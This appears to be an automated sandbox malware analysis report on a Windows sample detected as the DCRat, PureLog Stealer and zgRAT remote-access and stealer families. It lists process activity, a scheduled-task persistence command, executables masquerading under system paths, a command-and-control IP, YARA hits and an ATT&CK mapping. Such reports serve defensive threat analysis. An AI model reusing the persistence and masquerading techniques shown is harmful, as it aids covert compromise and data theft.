                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598484
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598375
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598266
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 598016
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597906
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597797
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597688
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597571
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 597031
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596922
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596812
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596703
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596594
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596469
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596359
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596250
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596141
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 596016
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595906
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595797
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595688
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595563
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595438
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595313
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595200
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 595093
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594984
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594875
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594766
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594656
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594547
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594438
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeThread delayed: delay time: 594328
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: KtMg6d1Ivx.exe, 00000000.00000002.2051978545.000000001C2F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}#
                    Source: w32tm.exe, 0000001C.00000002.2092493272.0000028EAF2B7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3249523523.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess token adjusted: Debug
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess token adjusted: Debug
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess token adjusted: Debug
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess token adjusted: Debug
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\feaq5o3p\feaq5o3p.cmdlineJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnwwums3\jnwwums3.cmdlineJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe'" /fJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFB8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBB09EA61AE75492FB889F62CD03E359D.TMP"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BC.tmp" "c:\Windows\System32\CSCB818CC877B7C4E7BA59872CD9B93F1.TMP"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe "C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe"
                    Source: conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000276D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000027.00000002.3254317705.000000000276D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{},"5.0.4",5,1,"","user","715575","Windows 10 Enterprise 64 Bit","N","Y","N","C:\\Windows\\ImmersiveControlPanel\\pris","Unknown (Unknown)","Unknown (Unknown)","Program Manager","81.181.57.74","US / United States","Georgia / Atlanta","33.7485 / -84.3871"]
                    Source: conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: own (Unknown)","Unknown (Unknown)","Program Manager","81.181.57.74","US / United States","Georgia / Atlanta","33.7485 / -84.3871
                    Source: conhost.exe, 00000027.00000002.3254317705.000000000297B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeQueries volume information: C:\Users\user\Desktop\KtMg6d1Ivx.exe VolumeInformationJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeQueries volume information: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe VolumeInformationJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeQueries volume information: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeQueries volume information: C:\Windows\ImmersiveControlPanel\pris\conhost.exe VolumeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeQueries volume information: C:\Windows\ImmersiveControlPanel\pris\conhost.exe VolumeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeQueries volume information: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe VolumeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeQueries volume information: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe VolumeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeQueries volume information: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe VolumeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeQueries volume information: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe VolumeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeQueries volume information: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe VolumeInformation
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeQueries volume information: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe VolumeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeQueries volume information: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe VolumeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeQueries volume information: C:\Windows\ImmersiveControlPanel\pris\conhost.exe VolumeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeQueries volume information: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe VolumeInformation
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeQueries volume information: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe VolumeInformation
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000000.00000002.2044761761.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.3254317705.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: KtMg6d1Ivx.exe PID: 5456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6576, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.KtMg6d1Ivx.exe.1b980000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2044761761.000000001307A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.KtMg6d1Ivx.exe.1b980000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000000.00000002.2044761761.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.3254317705.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: KtMg6d1Ivx.exe PID: 5456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6576, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.KtMg6d1Ivx.exe.1b980000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2044761761.000000001307A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.KtMg6d1Ivx.exe.1b980000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts121
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		233
                    Masquerading                    		OS Credential Dumping211
                    Security Software Discovery                    		1
                    Taint Shared Content                    		11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scripting                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		LSASS Memory2
                    Process Discovery                    		Remote Desktop Protocol1
                    Clipboard Data                    		1
                    Non-Application Layer Protocol                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt41
                    Registry Run Keys / Startup Folder                    		41
                    Registry Run Keys / Startup Folder                    		151
                    Virtualization/Sandbox Evasion                    		Security Account Manager151
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive11
                    Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		12
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information                    		Cached Domain Credentials134
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Software Packing                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    File Deletion                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1385347 Sample: KtMg6d1Ivx.exe Startdate: 02/02/2024 Architecture: WINDOWS Score: 100 60 Snort IDS alert for network traffic 2->60 62 Antivirus detection for URL or domain 2->62 64 Antivirus detection for dropped file 2->64 66 14 other signatures 2->66 7 KtMg6d1Ivx.exe 10 35 2->7         started        11 conhost.exe 2->11         started        13 conhost.exe 2->13         started        16 10 other processes 2->16 process3 dnsIp4 48 C:\Windows\...\conhost.exe, MS-DOS 7->48 dropped 50 C:\Windows\...\dZtDLPHWGnqMECrRIGtvnUL.exe, MS-DOS 7->50 dropped 52 C:\Users\user\Desktop\bveMYDWO.log, PE32 7->52 dropped 56 5 other malicious files 7->56 dropped 70 Creates an undocumented autostart registry key 7->70 72 Creates autostart registry keys with suspicious values (likely registry only malware) 7->72 74 Creates multiple autostart registry keys 7->74 84 4 other signatures 7->84 18 csc.exe 4 7->18         started        22 csc.exe 4 7->22         started        24 cmd.exe 7->24         started        26 16 other processes 7->26 76 Antivirus detection for dropped file 11->76 78 Multi AV Scanner detection for dropped file 11->78 80 Machine Learning detection for dropped file 11->80 82 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 11->82 58 185.87.199.107, 49711, 49712, 49715 IHCRUInternet-HostingLtdMoscowRussiaRU Russian Federation 13->58 54 C:\Users\user\Desktop\vnUJHstD.log, PE32 13->54 dropped file5 signatures6 process7 file8 44 C:\Windows\...\SecurityHealthSystray.exe, PE32 18->44 dropped 68 Infects executable files (exe, dll, sys, html) 18->68 28 conhost.exe 18->28         started        30 cvtres.exe 1 18->30         started        46 C:\Program Files (x86)\...\msedge.exe, PE32 22->46 dropped 32 conhost.exe 22->32         started        34 cvtres.exe 1 22->34         started        36 conhost.exe 24->36         started        38 chcp.com 24->38         started        40 w32tm.exe 24->40         started        42 Registry.exe 24->42         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.